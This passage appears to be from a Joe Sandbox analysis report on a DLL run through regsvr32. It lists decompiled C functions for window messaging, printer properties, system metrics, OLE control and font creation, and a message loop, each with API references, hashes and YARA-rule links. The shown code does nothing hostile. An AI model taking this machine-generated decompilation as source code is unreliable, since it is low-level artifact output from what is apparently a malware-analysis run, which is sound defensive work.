						_t33 = SendMessageA( *( *((intOrPtr*)(_t70 + 0x14)) + 0x1c), 0x111, 0xe147, ??);
						goto L25;
					}
				} else {
					if(_t27 != 0x3f107) {
						return  *((intOrPtr*)( *_t47 + 0xac))(_t27, 1);
					}
					return _t27;
				}
				L31:
			}

0x100259db
0x100259db
0x100259e0
0x100259e5
0x100259e6
0x100259ef
0x100259f1
0x100259f4
0x100259f8
0x100259fb
0x100259fd
0x10025a00
0x10025a03
0x10025a03
0x10025a08
0x10025a0c
0x10025a18
0x10025a1d
0x10025a1e
0x10025a23
0x10025a3e
0x10025a44
0x10025a4c
0x10025a4e
0x10025a4f
0x10026034
0x10026035
0x10026037
0x1002603c
0x1002605e
0x10026060
0x00000000
0x1002603e
0x10026043
0x10026045
0x10026056
0x10026056
0x1002605d
0x1002605d
0x10025a51
0x10025f96
0x10025f96
0x10025f97
0x10025f98
0x10025f99
0x10025f9a
0x10025f9b
0x10025f9f
0x10025fc4
0x10025fc4
0x10025fc8
0x00000000
0x00000000
0x10025fb8
0x10025fbc
0x10025fbf
0x00000000
0x10025fbf
0x1002602e
0x10026033
0x00000000
0x10026033
0x10025fca
0x10025fe2
0x10025fe2
0x10025fe6
0x00000000
0x00000000
0x10025fd6
0x10025fda
0x10025fdd
0x00000000
0x10025fdd
0x00000000
0x10025fda
0x10025fec
0x10025ff3
0x10025ff9
0x10025ff5
0x10025ff5
0x10025ff5
0x10025ffd
0x10026014
0x10026014
0x10026018
0x10026019
0x00000000
0x00000000
0x10026008
0x1002600c
0x1002600f
0x00000000
0x1002600f
0x00000000
0x1002600c
0x1002602c
0x00000000
0x1002602c
0x10025a25
0x10025a2a
0x00000000
0x10025a31
0x10025a37
0x10025a37
0x00000000

APIs

__EH_prolog.LIBCMT ref: 100259E0

Part of subcall function 100107F0: __EH_prolog.LIBCMT ref: 100107F5

GetCapture.USER32 ref: 10025F9F
SendMessageA.USER32 ref: 10025FB8
GetFocus.USER32 ref: 10025FCA
SendMessageA.USER32 ref: 10025FD6
GetLastActivePopup.USER32(?), ref: 10025FFD
SendMessageA.USER32 ref: 10026008
SendMessageA.USER32 ref: 1002602C

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
String ID:
API String ID: 2915395904-0
Opcode ID: 1868756b389529cf4455c842ec3834e36438baf64b94a4db3f3281535856cf44
Instruction ID: 783682ae1fd40623ef9dff1ae9101b1b5bed8c2e41133a072ea1f97791c34749
Opcode Fuzzy Hash: 1868756b389529cf4455c842ec3834e36438baf64b94a4db3f3281535856cf44
Instruction Fuzzy Hash: A641157470421AAFDB14DB74EC84EAF7AEDEF48391B620539F402C7251DB32EC0196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1001E009 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001E009(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E100252E7(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100252E7( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1001e00c
0x1001e00e
0x1001e010
0x1001e018
0x1001e032
0x1001e03a
0x1001e044
0x1001e04b
0x1001e04d
0x1001e052
0x1001e055
0x1001e055
0x1001e06c
0x1001e073
0x1001e08b
0x1001e090
0x1001e095
0x1001e095
0x1001e09b
0x1001e09b
0x1001e04b
0x1001e0a0
0x1001e0a4

APIs

GlobalLock.KERNEL32 ref: 1001E026
lstrcmpA.KERNEL32(?,?), ref: 1001E032
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001E044
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001E064
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001E06C
GlobalLock.KERNEL32 ref: 1001E076
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001E083
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001E09B

Part of subcall function 100252E7: GlobalFlags.KERNEL32(?), ref: 100252F1
Part of subcall function 100252E7: GlobalUnlock.KERNEL32(?,00000000,?,1001E095,?,00000000,?,?,00000000,00000000,00000002), ref: 10025302
Part of subcall function 100252E7: GlobalFree.KERNEL32 ref: 1002530D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 7b65abf6cc078237bdb933646263222204c9ae660642787b7cdfb4e9b32591aa
Instruction ID: 124cf2e802cae396f4c25565f6d404f7a9a181274e496d944d42d89b83b21ff8
Opcode Fuzzy Hash: 7b65abf6cc078237bdb933646263222204c9ae660642787b7cdfb4e9b32591aa
Instruction Fuzzy Hash: C7119A76500648BEDB229BA6DC86D6F7BFCEB89740B104829F646DA111C672ED80DB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002330D Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002330D(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1003a090 = GetSystemMetrics(2) + 1;
				 *0x1003a094 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x10023318
0x1002331e
0x10023325
0x1002332d
0x10023337
0x10023348
0x10023352
0x1002335a
0x10023366

APIs

GetSystemMetrics.USER32 ref: 1002331A
GetSystemMetrics.USER32 ref: 10023321
GetSystemMetrics.USER32 ref: 10023328
GetSystemMetrics.USER32 ref: 10023332
GetDC.USER32(00000000), ref: 1002333C
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002334D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10023355
ReleaseDC.USER32 ref: 1002335D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 866c45511ebbb025b3f3c174f79a81cecd09e788949084d9183ae73f2f2ad9cd
Instruction ID: c891c8e5a89503d55a866ebaabe51936f11af8778d7582ac80da58173786c339
Opcode Fuzzy Hash: 866c45511ebbb025b3f3c174f79a81cecd09e788949084d9183ae73f2f2ad9cd
Instruction Fuzzy Hash: A6F03671A407146EF7216F718CCAF277BB4EB81711F114419E7418B1D1D7B598028F50

Uniqueness

Uniqueness Score: -1.00%

Function 10007B3E Relevance: 10.7, APIs: 7, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10007B3E(void* __esi) {
				void* __ebx;
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011A8C(E1002A892, _t239);
				_t132 =  *0x100371f4; // 0x39cf7dc9
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E1002320B();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F51F(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B641(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10007060(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E100260E8(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100094AF( *((intOrPtr*)(_t239 + 8))) != 0 && E10009E59( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000AB40( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E10007AF1(_t183,  *(_t239 - 0x24) + 0xa0, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E10026453(_t239 - 0x94, _t218);
				E10002EB0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E10011A49(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}

0x10007b3e
0x10007b43
0x10007b4e
0x10007b55
0x10007b58
0x10007b5b
0x10007b60
0x10007b63
0x10007b66
0x10007b6e
0x10007b74
0x10007b7b
0x10007b85
0x10007b8d
0x10007b95
0x10007b98
0x10007b9c
0x10007ba0
0x10007ba3
0x10007ba3
0x10007ba6
0x10007bb4
0x10007bb5
0x10007bb9
0x10007bc8
0x10007bcb
0x10007bce
0x10007bd1
0x10007bdb
0x10007bde
0x10007be1
0x10007be3
0x10007be5
0x10007be9
0x10007bee
0x10007bf2
0x10007bf8
0x10007bfa
0x10007bfc
0x10007bff
0x10007bff
0x10007c02
0x10007c02
0x10007c04
0x10007c07
0x10007c0c
0x10007c16
0x10007c1f
0x10007c22
0x10007c25
0x10007c28
0x10007c2b
0x10007c39
0x10007c3b
0x10007c3b
0x10007c3e
0x10007c43
0x10007c46
0x10007c49
0x10007c4f
0x10007c4f
0x10007c51
0x10007c55
0x10007c5c
0x10007c62
0x10007c65
0x10007c69
0x10007ca0
0x10007ca6
0x10007ca9
0x10007cab
0x10007caf
0x10007cc3
0x10007cc3
0x10007cb1
0x10007cbc
0x10007cbc
0x10007cc5
0x10007cc9
0x10007c6b
0x10007c6d
0x10007c70
0x10007c75
0x10007c7c
0x10007c7f
0x10007c87
0x10007c8c
0x10007c8f
0x10007c92
0x10007c99
0x10007c99
0x10007ccc
0x10007cd5
0x10007cd5
0x10007cd8
0x10007cdb
0x10007cdb
0x10007ce2
0x10007ce5
0x10007cec
0x10007ced
0x10007cee
0x10007cf8
0x10007cf0
0x10007cf0
0x10007cf0
0x10007cfe
0x10007cff
0x10007d08
0x10007d09
0x10007d0c
0x10007d23
0x10007d27
0x10007d2a
0x10007d2c
0x10007d31
0x10007d80
0x10007d94
0x10007da0
0x10007db3
0x10007dbf
0x10007dcc
0x10007dd8
0x10007dd8
0x10007de2
0x10007de7
0x10007de7
0x10007ded
0x10007df2
0x10007e04
0x10007df4
0x10007dfc
0x10007dfe
0x10007dfe
0x10007e0c
0x10007e10
0x10007e1b
0x10007e24
0x10007e37

APIs

__EH_prolog.LIBCMT ref: 10007B43
MapDialogRect.USER32(?,?), ref: 10007BD1
SysAllocStringLen.OLEAUT32(?,00000000), ref: 10007BF2
CLSIDFromString.OLE32(?,00000004), ref: 10007CF0
CLSIDFromProgID.OLE32(?,00000004), ref: 10007CF8
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007D94
SysFreeString.OLEAUT32(?), ref: 10007DE7

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: d223bc54a626a02d4bdcfc234b8878bf8d1ea5ffda65f270a6bc6aa76187da1e
Instruction ID: f547f69fa172702107a7ee223b42c8d3fa36414f4287a314810d9a195d7f22cd
Opcode Fuzzy Hash: d223bc54a626a02d4bdcfc234b8878bf8d1ea5ffda65f270a6bc6aa76187da1e
Instruction Fuzzy Hash: DEA10575D00219DFEB04DFA8C884AEEBBF5FF08344F104169E809A7255E775AE95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10020530 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10020530(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100229FB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001E16D();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001E471();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E10022AD3(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001E3DD(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1002A4EB();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E10022AD3(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}

0x10020539
0x10020541
0x10020543
0x10020547
0x1002054b
0x10020559
0x10020559
0x1002055e
0x10020564
0x10020568
0x10020577
0x00000000
0x100205ef
0x00000000
0x100205ef
0x1002058d
0x100205f5
0x100205f5
0x100205f5
0x100205fc
0x00000000
0x00000000
0x10020600
0x10020606
0x1002060e
0x1002061b
0x10020623
0x10020625
0x10020625
0x1002060e
0x10020633
0x1002066e
0x00000000
0x10020635
0x10020641
0x10020643
0x1002064b
0x1002064b
0x1002065f
0x00000000
0x10020661
0x00000000
0x10020661
0x1002065f
0x10020633
0x10020663
0x10020664
0x00000000
0x10020669
0x10020591
0x10020597
0x1002059f
0x100205a1
0x100205a1
0x100205a8
0x100205c3
0x100205c3
0x100205ce
0x100205eb
0x100205eb
0x00000000
0x100205d0
0x100205dd
0x100205e3
0x100205e9
0x00000000
0x00000000
0x00000000
0x100205e9
0x100205ce
0x00000000
0x100205ef

APIs

GetParent.USER32(?), ref: 1002055E
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10020585
UpdateWindow.USER32(?), ref: 1002059F
SendMessageA.USER32 ref: 100205C3
SendMessageA.USER32 ref: 100205DD
UpdateWindow.USER32(?), ref: 10020623
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10020657

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: cb65867a9eb4373c6158ee252cbb866d2ad7f8a6270f2639e921e437d508cde4
Instruction ID: 57a57a635c9564d307a5664724594e8b67eaefdebe0d18bb17d264317e7a92ae
Opcode Fuzzy Hash: cb65867a9eb4373c6158ee252cbb866d2ad7f8a6270f2639e921e437d508cde4
Instruction Fuzzy Hash: EE419F30604B919FE721DF25EC88A1FBAF6FBC0B94F90092DF481914A2C772DA55CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10009811 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
comstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10009811(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				void* _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011A8C(E1002AB00, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x10036148(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1002d808;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E1000947C(_t109 - 0x54, 0x11) != 0 || E1000947C(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x100073e4
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x78)) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E100116D0(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E10008BC0(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10024F03(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E10028C6E(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x1002fc08, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					if(_t79 < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E10024F5E(_t109 - 0x8c);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1002c6ac;
				_t81 = E10025123(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E10011A49(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}

0x10009816
0x1000981b
0x10009821
0x10009829
0x1000982c
0x10009836
0x10009839
0x1000983c
0x10009843
0x10009848
0x1000984b
0x1000985e
0x10009876
0x00000000
0x1000986e
0x1000986e
0x1000986e
0x10009879
0x10009879
0x1000987f
0x10009882
0x1000988c
0x1000989b
0x100098a5
0x100098ba
0x100098c1
0x100098ca
0x100098d2
0x100098d9
0x100098e0
0x100098e3
0x100098e8
0x100098ea
0x100098ee
0x100098ee
0x100098f9
0x10009906
0x1000990a
0x1000991a
0x1000991d
0x10009921
0x10009924
0x10009927
0x10009932
0x10009936
0x1000993e
0x10009940
0x10009940
0x10009948
0x1000994b
0x1000994b
0x10009950
0x10009957
0x1000995e
0x1000996c
0x1000997f

APIs

__EH_prolog.LIBCMT ref: 10009816
GetObjectA.GDI32(100073E4,0000003C,?), ref: 10009882
lstrlenA.KERNEL32(?), ref: 10009893
GetDeviceCaps.GDI32(?,0000005A), ref: 1000990A
OleCreateFontIndirect.OLEAUT32(00000020,1002FC08,?), ref: 10009936

Strings

, xrefs: 1000988C

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

